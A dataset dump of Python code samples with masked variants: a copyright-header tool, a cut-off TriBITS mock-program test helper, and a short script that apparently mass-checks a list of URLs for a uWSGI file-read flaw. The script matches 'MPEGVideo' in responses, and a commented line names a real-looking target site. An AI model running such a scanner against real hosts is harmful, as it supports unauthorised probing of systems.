code
stringlengths 13
1.2M
| order_type
stringclasses 1
value | original_example
dict | step_ids
listlengths 1
5
|
---|---|---|---|
#coding=utf-8
import requests,sys
result_url=[]
def main():
counts=open(sys.argv[1]).readlines()
for line in open(sys.argv[1]):
line=line.strip("\n")
url=line
try:
#url="http://s6000.sgcc.com.cn/WebContent/s6000/main/index.jsp#no-back"
r=requests.get(url,verify=True,timeout=3)
print(url+" "+str(r.status_code))
print(str(r.text))
if r.status_code==200 and "MPEGVideo" in r.text:
result_url.append(url)
except Exception as e:
print(str(e))
for i in result_url:
print(i)
file_200.write(i+"\n")
if __name__ == '__main__':
file_200=open("result_uWSGI_file.txt","w")
main()
file_200.flush()
file_200.close()
|
normal
|
{
"blob_id": "96a4659f03879e051af95b5aa9c1e1364015fb86",
"index": 8723,
"step-1": "<mask token>\n\n\ndef main():\n counts = open(sys.argv[1]).readlines()\n for line in open(sys.argv[1]):\n line = line.strip('\\n')\n url = line\n try:\n r = requests.get(url, verify=True, timeout=3)\n print(url + ' ' + str(r.status_code))\n print(str(r.text))\n if r.status_code == 200 and 'MPEGVideo' in r.text:\n result_url.append(url)\n except Exception as e:\n print(str(e))\n for i in result_url:\n print(i)\n file_200.write(i + '\\n')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n counts = open(sys.argv[1]).readlines()\n for line in open(sys.argv[1]):\n line = line.strip('\\n')\n url = line\n try:\n r = requests.get(url, verify=True, timeout=3)\n print(url + ' ' + str(r.status_code))\n print(str(r.text))\n if r.status_code == 200 and 'MPEGVideo' in r.text:\n result_url.append(url)\n except Exception as e:\n print(str(e))\n for i in result_url:\n print(i)\n file_200.write(i + '\\n')\n\n\nif __name__ == '__main__':\n file_200 = open('result_uWSGI_file.txt', 'w')\n main()\n file_200.flush()\n file_200.close()\n",
"step-3": "<mask token>\nresult_url = []\n\n\ndef main():\n counts = open(sys.argv[1]).readlines()\n for line in open(sys.argv[1]):\n line = line.strip('\\n')\n url = line\n try:\n r = requests.get(url, verify=True, timeout=3)\n print(url + ' ' + str(r.status_code))\n print(str(r.text))\n if r.status_code == 200 and 'MPEGVideo' in r.text:\n result_url.append(url)\n except Exception as e:\n print(str(e))\n for i in result_url:\n print(i)\n file_200.write(i + '\\n')\n\n\nif __name__ == '__main__':\n file_200 = open('result_uWSGI_file.txt', 'w')\n main()\n file_200.flush()\n file_200.close()\n",
"step-4": "import requests, sys\nresult_url = []\n\n\ndef main():\n counts = open(sys.argv[1]).readlines()\n for line in open(sys.argv[1]):\n line = line.strip('\\n')\n url = line\n try:\n r = requests.get(url, verify=True, timeout=3)\n print(url + ' ' + str(r.status_code))\n print(str(r.text))\n if r.status_code == 200 and 'MPEGVideo' in r.text:\n result_url.append(url)\n except Exception as e:\n print(str(e))\n for i in result_url:\n print(i)\n file_200.write(i + '\\n')\n\n\nif __name__ == '__main__':\n file_200 = open('result_uWSGI_file.txt', 'w')\n main()\n file_200.flush()\n file_200.close()\n",
"step-5": "#coding=utf-8\r\nimport requests,sys\r\nresult_url=[]\r\n\r\ndef main():\r\n counts=open(sys.argv[1]).readlines()\r\n for line in open(sys.argv[1]):\r\n line=line.strip(\"\\n\")\r\n url=line\r\n try:\r\n #url=\"http://s6000.sgcc.com.cn/WebContent/s6000/main/index.jsp#no-back\"\r\n r=requests.get(url,verify=True,timeout=3)\r\n print(url+\" \"+str(r.status_code))\r\n print(str(r.text))\r\n if r.status_code==200 and \"MPEGVideo\" in r.text:\r\n result_url.append(url) \r\n except Exception as e:\r\n print(str(e))\r\n for i in result_url:\r\n print(i)\r\n file_200.write(i+\"\\n\")\r\n\r\nif __name__ == '__main__':\r\n file_200=open(\"result_uWSGI_file.txt\",\"w\") \r\n main()\r\n file_200.flush() \r\n file_200.close() \r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# Copyright (C) 2020 Francis Sun, all rights reserved.
"""A copyright utility"""
import datetime
import argparse
import os
import os.path
class Copyright:
_file_type = {
'c/c++': ['h', 'c', 'cpp', 'cc'],
'python': ['py'],
'cmake': ['cmake'],
'vim': ['vim'],
'shell': ['sh']
}
_declaration = "Copyright (C) {0} {1}, all rights reserved."
_formaters = {}
def __init__(self, file_path, author):
self.file_path = file_path
self.author = author
file_name = self.file_path.split(os.path.sep)[-1]
if file_name == 'CMakeLists.txt':
self.file_type = 'cmake'
elif file_name == 'vimrc':
self.file_type = 'vim'
else:
self.file_type = self.file_path.split('.')[-1]
self.declaration = Copyright._declaration.format(
datetime.date.today().year, self.author)
def _c_cpp_formater(self):
return "/* " + self.declaration + " */"
for ft in _file_type['c/c++']:
_formaters[ft] = _c_cpp_formater
def _py_formater(self):
return "# " + self.declaration
for ft in _file_type['python']:
_formaters[ft] = _py_formater
def _cmake_formater(self):
return "# " + self.declaration
for ft in _file_type['cmake']:
_formaters[ft] = _cmake_formater
def _vim_formater(self):
return "\" " + self.declaration
for ft in _file_type['vim']:
_formaters[ft] = _vim_formater
def _shell_formater(self):
return "# " + self.declaration
for ft in _file_type['shell']:
_formaters[ft] = _shell_formater
def get_declaration(self):
if self.file_type in Copyright._formaters:
return Copyright._formaters[self.file_type](self)
tmp_filename_suffix = ".fjcu"
def Write(self):
tmp_filename = self.file_path + Copyright.tmp_filename_suffix
with open(tmp_filename, 'w') as tmp_f:
origin_content = ""
if os.path.isfile(self.file_path):
with open(self.file_path, 'r') as origin_f:
origin_content = origin_f.read()
tmp_f.write(self.get_declaration() + "\n" + origin_content)
os.replace(tmp_filename, self.file_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('file_path')
parser.add_argument('author')
opt = parser.parse_args()
cr = Copyright(opt.file_path, opt.author)
cr.Write()
|
normal
|
{
"blob_id": "dc05a441c21a67fbb3a1975b3fccb865a32731c8",
"index": 4642,
"step-1": "<mask token>\n\n\nclass Copyright:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def _c_cpp_formater(self):\n return '/* ' + self.declaration + ' */'\n for ft in _file_type['c/c++']:\n _formaters[ft] = _c_cpp_formater\n <mask token>\n for ft in _file_type['python']:\n _formaters[ft] = _py_formater\n\n def _cmake_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['cmake']:\n _formaters[ft] = _cmake_formater\n <mask token>\n for ft in _file_type['vim']:\n _formaters[ft] = _vim_formater\n\n def _shell_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['shell']:\n _formaters[ft] = _shell_formater\n <mask token>\n <mask token>\n\n def Write(self):\n tmp_filename = self.file_path + Copyright.tmp_filename_suffix\n with open(tmp_filename, 'w') as tmp_f:\n origin_content = ''\n if os.path.isfile(self.file_path):\n with open(self.file_path, 'r') as origin_f:\n origin_content = origin_f.read()\n tmp_f.write(self.get_declaration() + '\\n' + origin_content)\n os.replace(tmp_filename, self.file_path)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Copyright:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def _c_cpp_formater(self):\n return '/* ' + self.declaration + ' */'\n for ft in _file_type['c/c++']:\n _formaters[ft] = _c_cpp_formater\n\n def _py_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['python']:\n _formaters[ft] = _py_formater\n\n def _cmake_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['cmake']:\n _formaters[ft] = _cmake_formater\n <mask token>\n for ft in _file_type['vim']:\n _formaters[ft] = _vim_formater\n\n def _shell_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['shell']:\n _formaters[ft] = _shell_formater\n\n def get_declaration(self):\n if self.file_type in Copyright._formaters:\n return Copyright._formaters[self.file_type](self)\n <mask token>\n\n def Write(self):\n tmp_filename = self.file_path + Copyright.tmp_filename_suffix\n with open(tmp_filename, 'w') as tmp_f:\n origin_content = ''\n if os.path.isfile(self.file_path):\n with open(self.file_path, 'r') as origin_f:\n origin_content = origin_f.read()\n tmp_f.write(self.get_declaration() + '\\n' + origin_content)\n os.replace(tmp_filename, self.file_path)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Copyright:\n _file_type = {'c/c++': ['h', 'c', 'cpp', 'cc'], 'python': ['py'],\n 'cmake': ['cmake'], 'vim': ['vim'], 'shell': ['sh']}\n _declaration = 'Copyright (C) {0} {1}, all rights reserved.'\n _formaters = {}\n\n def __init__(self, file_path, author):\n self.file_path = file_path\n self.author = author\n file_name = self.file_path.split(os.path.sep)[-1]\n if file_name == 'CMakeLists.txt':\n self.file_type = 'cmake'\n elif file_name == 'vimrc':\n self.file_type = 'vim'\n else:\n self.file_type = self.file_path.split('.')[-1]\n self.declaration = Copyright._declaration.format(datetime.date.\n today().year, self.author)\n\n def _c_cpp_formater(self):\n return '/* ' + self.declaration + ' */'\n for ft in _file_type['c/c++']:\n _formaters[ft] = _c_cpp_formater\n\n def _py_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['python']:\n _formaters[ft] = _py_formater\n\n def _cmake_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['cmake']:\n _formaters[ft] = _cmake_formater\n\n def _vim_formater(self):\n return '\" ' + self.declaration\n for ft in _file_type['vim']:\n _formaters[ft] = _vim_formater\n\n def _shell_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['shell']:\n _formaters[ft] = _shell_formater\n\n def get_declaration(self):\n if self.file_type in Copyright._formaters:\n return Copyright._formaters[self.file_type](self)\n tmp_filename_suffix = '.fjcu'\n\n def Write(self):\n tmp_filename = self.file_path + Copyright.tmp_filename_suffix\n with open(tmp_filename, 'w') as tmp_f:\n origin_content = ''\n if os.path.isfile(self.file_path):\n with open(self.file_path, 'r') as origin_f:\n origin_content = origin_f.read()\n tmp_f.write(self.get_declaration() + '\\n' + origin_content)\n os.replace(tmp_filename, self.file_path)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('file_path')\n parser.add_argument('author')\n opt = parser.parse_args()\n cr = Copyright(opt.file_path, opt.author)\n cr.Write()\n",
"step-4": "<mask token>\nimport datetime\nimport argparse\nimport os\nimport os.path\n\n\nclass Copyright:\n _file_type = {'c/c++': ['h', 'c', 'cpp', 'cc'], 'python': ['py'],\n 'cmake': ['cmake'], 'vim': ['vim'], 'shell': ['sh']}\n _declaration = 'Copyright (C) {0} {1}, all rights reserved.'\n _formaters = {}\n\n def __init__(self, file_path, author):\n self.file_path = file_path\n self.author = author\n file_name = self.file_path.split(os.path.sep)[-1]\n if file_name == 'CMakeLists.txt':\n self.file_type = 'cmake'\n elif file_name == 'vimrc':\n self.file_type = 'vim'\n else:\n self.file_type = self.file_path.split('.')[-1]\n self.declaration = Copyright._declaration.format(datetime.date.\n today().year, self.author)\n\n def _c_cpp_formater(self):\n return '/* ' + self.declaration + ' */'\n for ft in _file_type['c/c++']:\n _formaters[ft] = _c_cpp_formater\n\n def _py_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['python']:\n _formaters[ft] = _py_formater\n\n def _cmake_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['cmake']:\n _formaters[ft] = _cmake_formater\n\n def _vim_formater(self):\n return '\" ' + self.declaration\n for ft in _file_type['vim']:\n _formaters[ft] = _vim_formater\n\n def _shell_formater(self):\n return '# ' + self.declaration\n for ft in _file_type['shell']:\n _formaters[ft] = _shell_formater\n\n def get_declaration(self):\n if self.file_type in Copyright._formaters:\n return Copyright._formaters[self.file_type](self)\n tmp_filename_suffix = '.fjcu'\n\n def Write(self):\n tmp_filename = self.file_path + Copyright.tmp_filename_suffix\n with open(tmp_filename, 'w') as tmp_f:\n origin_content = ''\n if os.path.isfile(self.file_path):\n with open(self.file_path, 'r') as origin_f:\n origin_content = origin_f.read()\n tmp_f.write(self.get_declaration() + '\\n' + origin_content)\n os.replace(tmp_filename, self.file_path)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('file_path')\n parser.add_argument('author')\n opt = parser.parse_args()\n cr = Copyright(opt.file_path, opt.author)\n cr.Write()\n",
"step-5": "# Copyright (C) 2020 Francis Sun, all rights reserved.\n\n\"\"\"A copyright utility\"\"\"\n\nimport datetime\nimport argparse\nimport os\nimport os.path\n\n\nclass Copyright:\n _file_type = {\n 'c/c++': ['h', 'c', 'cpp', 'cc'],\n 'python': ['py'],\n 'cmake': ['cmake'],\n 'vim': ['vim'],\n 'shell': ['sh']\n }\n _declaration = \"Copyright (C) {0} {1}, all rights reserved.\"\n _formaters = {}\n\n def __init__(self, file_path, author):\n self.file_path = file_path\n self.author = author\n file_name = self.file_path.split(os.path.sep)[-1]\n\n if file_name == 'CMakeLists.txt':\n self.file_type = 'cmake'\n elif file_name == 'vimrc':\n self.file_type = 'vim'\n else:\n self.file_type = self.file_path.split('.')[-1]\n\n self.declaration = Copyright._declaration.format(\n datetime.date.today().year, self.author)\n\n def _c_cpp_formater(self):\n return \"/* \" + self.declaration + \" */\"\n for ft in _file_type['c/c++']:\n _formaters[ft] = _c_cpp_formater\n\n def _py_formater(self):\n return \"# \" + self.declaration\n for ft in _file_type['python']:\n _formaters[ft] = _py_formater\n\n def _cmake_formater(self):\n return \"# \" + self.declaration\n for ft in _file_type['cmake']:\n _formaters[ft] = _cmake_formater\n\n def _vim_formater(self):\n return \"\\\" \" + self.declaration\n for ft in _file_type['vim']:\n _formaters[ft] = _vim_formater\n\n def _shell_formater(self):\n return \"# \" + self.declaration\n for ft in _file_type['shell']:\n _formaters[ft] = _shell_formater\n\n def get_declaration(self):\n if self.file_type in Copyright._formaters:\n return Copyright._formaters[self.file_type](self)\n\n tmp_filename_suffix = \".fjcu\"\n\n def Write(self):\n tmp_filename = self.file_path + Copyright.tmp_filename_suffix\n with open(tmp_filename, 'w') as tmp_f:\n origin_content = \"\"\n if os.path.isfile(self.file_path):\n with open(self.file_path, 'r') as origin_f:\n origin_content = origin_f.read()\n tmp_f.write(self.get_declaration() + \"\\n\" + origin_content)\n os.replace(tmp_filename, self.file_path)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('file_path')\n parser.add_argument('author')\n opt = parser.parse_args()\n cr = Copyright(opt.file_path, opt.author)\n cr.Write()\n",
"step-ids": [
5,
7,
11,
12,
13
]
}
|
[
5,
7,
11,
12,
13
] |
#!/usr/bin/env python
# @HEADER
# ************************************************************************
#
# TriBITS: Tribal Build, Integrate, and Test System
# Copyright 2013 Sandia Corporation
#
# Under the terms of Contract DE-AC04-94AL85000 with Sandia Corporation,
# the U.S. Government retains certain rights in this software.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the Corporation nor the names of the
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY SANDIA CORPORATION "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL SANDIA CORPORATION OR THE
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# ************************************************************************
# @HEADER
#
# Usage: mockprogram.py [any arguments]
#
# Mock program that takes input arguments and produces stdout by reading from
# a file .mockprogram_inout.txt in the current directory or the file specified
# by the env var MOCKPROGRAM_INOUT_FILE_OVERRIDE (which can be in any
# directory). This script is used to take the place of real commands during a
# test that involves calling commands on the commandline.
#
# The file .mockprogram_inout.txt (or pointed to by
# MOCKPROGRAM_INOUT_FILE_OVERRIDE) is of the form:
#
# MOCK_PROGRAM_INPUT: <args_1>
# MOCK_PROGRAM_RETURN: <rtn>
# MOCK_PROGRAM_OUTPUT: <outline_1_line_1>
# <outline_1_line_2>
# ...
# MOCK_PROGRAM_INPUT: <args_2>
#
# The program reads in the blocks starting at the time and removes the block
# from the file after it runs. After all of the blocks are read in, if run
# again it will error out with error code 2.
#
# This program can be used, for example, to simulate git command. For
# example, a couple of git commits might be simulated like:
#
# MOCK_PROGRAM_INPUT: log -1
# MOCK_PROGRAM_RETURN: 0
# MOCK_PROGRAM_OUTPUT: This is the summary line
#
# The is the body of the commit msg
# MOCK_PROGRAM_INPUT: diff --name-only HEAD --not @{u}
# MOCK_PROGRAM_RETURN: 0
# MOCK_PROGRAM_OUTPUT: file_name_1.txt
# file_name_2.txt
# file_name_3.txt
#
import sys
import os
inputArgs = ' '.join(sys.argv[1:])
#print("inputArgs = '" + inputArgs + "'"
if os.environ.get("MOCKPROGRAM_INOUT_FILE_OVERRIDE"):
mockProgramInOutFilePath=os.environ.get("MOCKPROGRAM_INOUT_FILE_OVERRIDE")
else:
mockProgramInOutFilePath='.mockprogram_inout.txt'
if not os.path.exists(mockProgramInOutFilePath):
print("Error: "+mockProgramInOutFilePath+" is missing!")
sys.exit(1)
mockprogramInout = open(mockProgramInOutFilePath, 'r').read()
mockprogramInoutArray = mockprogramInout.splitlines()
if len(mockprogramInoutArray) and mockprogramInoutArray[-1] == "":
mockprogramInoutArray = mockprogramInoutArray[:-1]
if len(mockprogramInoutArray) < 3:
print("Error: "+mockProgramInOutFilePath+" has less than three lines:\n"
"-------------\n" + mockprogramInout + "-------------")
sys.exit(2)
# Assert input
expectedInputLine = mockprogramInoutArray[0]
if expectedInputLine.find("MOCK_PROGRAM_INPUT:") != 0:
print("Error, first line = '" + expectedInputLine + "', does not match "
"^MOCK_PROGRAM_INPUT:")
sys.exit(3)
expectedInput = expectedInputLine.replace("MOCK_PROGRAM_INPUT:", "").strip()
if inputArgs != expectedInput:
print("Error, input args='" + inputArgs + "' does not match expected='" +
expectedInput + "'")
sys.exit(4)
# Get return code
returnCodeLine = mockprogramInoutArray[1]
if returnCodeLine.find("MOCK_PROGRAM_RETURN:") != 0:
print("Error, second line = '" + returnCodeLine + "', does not match "
"^MOCK_PROGRAM_RETURN:")
sys.exit(5)
returnCode = returnCodeLine.replace("MOCK_PROGRAM_RETURN:", "").strip()
# Get output (can be multi-line)
outputLine = mockprogramInoutArray[2]
if outputLine.find("MOCK_PROGRAM_OUTPUT:") != 0:
print("Error, third line = '" + outputLine + "', does not match "
"^MOCK_PROGRAM_OUTPUT:")
sys.exit(6)
outputStr = outputLine.replace("MOCK_PROGRAM_OUTPUT: ", "")
numLinesOuput = 1
if len(mockprogramInoutArray) > 3:
for line in mockprogramInoutArray[3:]:
if line.find("MOCK_PROGRAM_INPUT:") == 0:
break
outputStr = outputStr+"\n"+line
numLinesOuput = numLinesOuput + 1
print(outputStr)
# Write the remaining lines back into the file
lineLineIndex = 2 + numLinesOuput
if len(mockprogramInoutArray) > lineLineIndex:
open(mockProgramInOutFilePath, 'w').write(
('\n'.join(mockprogramInoutArray[lineLineIndex:]))+"\n" )
else:
open(mockProgramInOutFilePath, 'w').write("")
# Return exit code
sys.exit(int(returnCode))
|
normal
|
{
"blob_id": "550f5ad4fef77d5795db0393ae0701f679143e72",
"index": 221,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif os.environ.get('MOCKPROGRAM_INOUT_FILE_OVERRIDE'):\n mockProgramInOutFilePath = os.environ.get('MOCKPROGRAM_INOUT_FILE_OVERRIDE'\n )\nelse:\n mockProgramInOutFilePath = '.mockprogram_inout.txt'\nif not os.path.exists(mockProgramInOutFilePath):\n print('Error: ' + mockProgramInOutFilePath + ' is missing!')\n sys.exit(1)\n<mask token>\nif len(mockprogramInoutArray) and mockprogramInoutArray[-1] == '':\n mockprogramInoutArray = mockprogramInoutArray[:-1]\nif len(mockprogramInoutArray) < 3:\n print('Error: ' + mockProgramInOutFilePath +\n ' has less than three lines:\\n-------------\\n' + mockprogramInout +\n '-------------')\n sys.exit(2)\n<mask token>\nif expectedInputLine.find('MOCK_PROGRAM_INPUT:') != 0:\n print(\"Error, first line = '\" + expectedInputLine +\n \"', does not match ^MOCK_PROGRAM_INPUT:\")\n sys.exit(3)\n<mask token>\nif inputArgs != expectedInput:\n print(\"Error, input args='\" + inputArgs + \"' does not match expected='\" +\n expectedInput + \"'\")\n sys.exit(4)\n<mask token>\nif returnCodeLine.find('MOCK_PROGRAM_RETURN:') != 0:\n print(\"Error, second line = '\" + returnCodeLine +\n \"', does not match ^MOCK_PROGRAM_RETURN:\")\n sys.exit(5)\n<mask token>\nif outputLine.find('MOCK_PROGRAM_OUTPUT:') != 0:\n print(\"Error, third line = '\" + outputLine +\n \"', does not match ^MOCK_PROGRAM_OUTPUT:\")\n sys.exit(6)\n<mask token>\nif len(mockprogramInoutArray) > 3:\n for line in mockprogramInoutArray[3:]:\n if line.find('MOCK_PROGRAM_INPUT:') == 0:\n break\n outputStr = outputStr + '\\n' + line\n numLinesOuput = numLinesOuput + 1\nprint(outputStr)\n<mask token>\nif len(mockprogramInoutArray) > lineLineIndex:\n open(mockProgramInOutFilePath, 'w').write('\\n'.join(\n mockprogramInoutArray[lineLineIndex:]) + '\\n')\nelse:\n open(mockProgramInOutFilePath, 'w').write('')\nsys.exit(int(returnCode))\n",
"step-3": "<mask token>\ninputArgs = ' '.join(sys.argv[1:])\nif os.environ.get('MOCKPROGRAM_INOUT_FILE_OVERRIDE'):\n mockProgramInOutFilePath = os.environ.get('MOCKPROGRAM_INOUT_FILE_OVERRIDE'\n )\nelse:\n mockProgramInOutFilePath = '.mockprogram_inout.txt'\nif not os.path.exists(mockProgramInOutFilePath):\n print('Error: ' + mockProgramInOutFilePath + ' is missing!')\n sys.exit(1)\nmockprogramInout = open(mockProgramInOutFilePath, 'r').read()\nmockprogramInoutArray = mockprogramInout.splitlines()\nif len(mockprogramInoutArray) and mockprogramInoutArray[-1] == '':\n mockprogramInoutArray = mockprogramInoutArray[:-1]\nif len(mockprogramInoutArray) < 3:\n print('Error: ' + mockProgramInOutFilePath +\n ' has less than three lines:\\n-------------\\n' + mockprogramInout +\n '-------------')\n sys.exit(2)\nexpectedInputLine = mockprogramInoutArray[0]\nif expectedInputLine.find('MOCK_PROGRAM_INPUT:') != 0:\n print(\"Error, first line = '\" + expectedInputLine +\n \"', does not match ^MOCK_PROGRAM_INPUT:\")\n sys.exit(3)\nexpectedInput = expectedInputLine.replace('MOCK_PROGRAM_INPUT:', '').strip()\nif inputArgs != expectedInput:\n print(\"Error, input args='\" + inputArgs + \"' does not match expected='\" +\n expectedInput + \"'\")\n sys.exit(4)\nreturnCodeLine = mockprogramInoutArray[1]\nif returnCodeLine.find('MOCK_PROGRAM_RETURN:') != 0:\n print(\"Error, second line = '\" + returnCodeLine +\n \"', does not match ^MOCK_PROGRAM_RETURN:\")\n sys.exit(5)\nreturnCode = returnCodeLine.replace('MOCK_PROGRAM_RETURN:', '').strip()\noutputLine = mockprogramInoutArray[2]\nif outputLine.find('MOCK_PROGRAM_OUTPUT:') != 0:\n print(\"Error, third line = '\" + outputLine +\n \"', does not match ^MOCK_PROGRAM_OUTPUT:\")\n sys.exit(6)\noutputStr = outputLine.replace('MOCK_PROGRAM_OUTPUT: ', '')\nnumLinesOuput = 1\nif len(mockprogramInoutArray) > 3:\n for line in mockprogramInoutArray[3:]:\n if line.find('MOCK_PROGRAM_INPUT:') == 0:\n break\n outputStr = outputStr + '\\n' + line\n numLinesOuput = numLinesOuput + 1\nprint(outputStr)\nlineLineIndex = 2 + numLinesOuput\nif len(mockprogramInoutArray) > lineLineIndex:\n open(mockProgramInOutFilePath, 'w').write('\\n'.join(\n mockprogramInoutArray[lineLineIndex:]) + '\\n')\nelse:\n open(mockProgramInOutFilePath, 'w').write('')\nsys.exit(int(returnCode))\n",
"step-4": "import sys\nimport os\ninputArgs = ' '.join(sys.argv[1:])\nif os.environ.get('MOCKPROGRAM_INOUT_FILE_OVERRIDE'):\n mockProgramInOutFilePath = os.environ.get('MOCKPROGRAM_INOUT_FILE_OVERRIDE'\n )\nelse:\n mockProgramInOutFilePath = '.mockprogram_inout.txt'\nif not os.path.exists(mockProgramInOutFilePath):\n print('Error: ' + mockProgramInOutFilePath + ' is missing!')\n sys.exit(1)\nmockprogramInout = open(mockProgramInOutFilePath, 'r').read()\nmockprogramInoutArray = mockprogramInout.splitlines()\nif len(mockprogramInoutArray) and mockprogramInoutArray[-1] == '':\n mockprogramInoutArray = mockprogramInoutArray[:-1]\nif len(mockprogramInoutArray) < 3:\n print('Error: ' + mockProgramInOutFilePath +\n ' has less than three lines:\\n-------------\\n' + mockprogramInout +\n '-------------')\n sys.exit(2)\nexpectedInputLine = mockprogramInoutArray[0]\nif expectedInputLine.find('MOCK_PROGRAM_INPUT:') != 0:\n print(\"Error, first line = '\" + expectedInputLine +\n \"', does not match ^MOCK_PROGRAM_INPUT:\")\n sys.exit(3)\nexpectedInput = expectedInputLine.replace('MOCK_PROGRAM_INPUT:', '').strip()\nif inputArgs != expectedInput:\n print(\"Error, input args='\" + inputArgs + \"' does not match expected='\" +\n expectedInput + \"'\")\n sys.exit(4)\nreturnCodeLine = mockprogramInoutArray[1]\nif returnCodeLine.find('MOCK_PROGRAM_RETURN:') != 0:\n print(\"Error, second line = '\" + returnCodeLine +\n \"', does not match ^MOCK_PROGRAM_RETURN:\")\n sys.exit(5)\nreturnCode = returnCodeLine.replace('MOCK_PROGRAM_RETURN:', '').strip()\noutputLine = mockprogramInoutArray[2]\nif outputLine.find('MOCK_PROGRAM_OUTPUT:') != 0:\n print(\"Error, third line = '\" + outputLine +\n \"', does not match ^MOCK_PROGRAM_OUTPUT:\")\n sys.exit(6)\noutputStr = outputLine.replace('MOCK_PROGRAM_OUTPUT: ', '')\nnumLinesOuput = 1\nif len(mockprogramInoutArray) > 3:\n for line in mockprogramInoutArray[3:]:\n if line.find('MOCK_PROGRAM_INPUT:') == 0:\n break\n outputStr = outputStr + '\\n' + line\n numLinesOuput = numLinesOuput + 1\nprint(outputStr)\nlineLineIndex = 2 + numLinesOuput\nif len(mockprogramInoutArray) > lineLineIndex:\n open(mockProgramInOutFilePath, 'w').write('\\n'.join(\n mockprogramInoutArray[lineLineIndex:]) + '\\n')\nelse:\n open(mockProgramInOutFilePath, 'w').write('')\nsys.exit(int(returnCode))\n",
"step-5": "#!/usr/bin/env python\n\n# @HEADER\n# ************************************************************************\n#\n# TriBITS: Tribal Build, Integrate, and Test System\n# Copyright 2013 Sandia Corporation\n#\n# Under the terms of Contract DE-AC04-94AL85000 with Sandia Corporation,\n# the U.S. Government retains certain rights in this software.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# 3. Neither the name of the Corporation nor the names of the\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY SANDIA CORPORATION \"AS IS\" AND ANY\n# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL SANDIA CORPORATION OR THE\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n# ************************************************************************\n# @HEADER\n\n#\n# Usage: mockprogram.py [any arguments]\n#\n# Mock program that takes input arguments and produces stdout by reading from\n# a file .mockprogram_inout.txt in the current directory or the file specified\n# by the env var MOCKPROGRAM_INOUT_FILE_OVERRIDE (which can be in any\n# directory). This script is used to take the place of real commands during a\n# test that involves calling commands on the commandline.\n#\n# The file .mockprogram_inout.txt (or pointed to by\n# MOCKPROGRAM_INOUT_FILE_OVERRIDE) is of the form:\n#\n# MOCK_PROGRAM_INPUT: <args_1>\n# MOCK_PROGRAM_RETURN: <rtn>\n# MOCK_PROGRAM_OUTPUT: <outline_1_line_1>\n# <outline_1_line_2>\n# ...\n# MOCK_PROGRAM_INPUT: <args_2>\n#\n# The program reads in the blocks starting at the time and removes the block\n# from the file after it runs. After all of the blocks are read in, if run\n# again it will error out with error code 2.\n#\n# This program can be used, for example, to simulate git command. For\n# example, a couple of git commits might be simulated like:\n#\n# 